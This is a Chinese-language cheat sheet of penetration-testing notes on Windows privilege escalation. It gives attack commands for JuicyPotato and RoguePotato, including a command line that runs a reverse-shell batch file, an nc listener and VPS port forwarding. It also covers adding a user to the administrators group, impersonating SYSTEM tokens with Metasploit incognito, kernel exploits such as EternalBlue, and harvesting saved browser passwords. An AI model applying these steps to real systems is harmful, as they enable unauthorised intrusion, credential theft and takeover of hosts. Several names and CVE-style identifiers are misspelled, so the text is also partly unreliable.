内网渗透—Windows提权方法总结

3a原则

• 认证

• 授权

• 审计

组相关命令

• net localgroup
• net localgroup administrators test *add
• net localgroup testgroup /add

potato 家族提权

通过各种方法在本地（NILM-relay）中获取system令牌，再通过模拟令牌进行命令执行（拿到令牌的方式不同就会有不同的patato）。

windows的token：

• delegation token（授权令牌）：（用于于交互会话登录）（例如远程登录，本地登录）

• impersonation token（模拟令牌）：非交互会话登录(例如用net user访问用户文件)

• sip和sap特权（本地管理员，SCM（服务控制管理器）启动的服务，COM对象（接口，通信协议，可以提供服务））

windows服务使用的登录账号

• NT AUTHORITY\System

• NT AUTHORITY\Network Service

• NT AUTHORITY\Local Server  常见用户（iis，sqlserver）

JuicyPotato

• 通过NTML欺骗获取token

• 通过（CLSID）枚举可用的com对象 利用可用的身份去调用一个api函数，传入获取到的token去模拟令牌执行对应的高权限命令或者反弹shell

### 操作流程

• 先上去 whoami /priv 看看是否有特权

• 攻击机端口监听

• JuicyPotato.exe -t $ -p C: \Users\user \Desktop\Rev.bat -l 1337 -c{83ca98d6-ff5d-49b8-abc6-83dd84127820}

RoguePotato

高版本的windows不允许在本地NTLM请求，

• 外部请求vps

• 将获取到的token再转发回去

操作流程

• 获取反弹shell （nc -lvvp 3333）（chcp 65001）

• *对应文件（尽可能跳到低权限文件夹）

• vps监听端口转发

• 执行命令

##  AlwaysInstallElevated 系统配置错误提权

令牌窃取(也可以用来降权)

1.msf use incognito

2.list_tokens -u

3.impersonate_token"NTAUTHORITY\SYSTEM"

内核提权（永恒之蓝ms170-010）（ms15-051）

msf一顿扫

密码收集

1.直接看浏览器保存的密码

mysql udf提权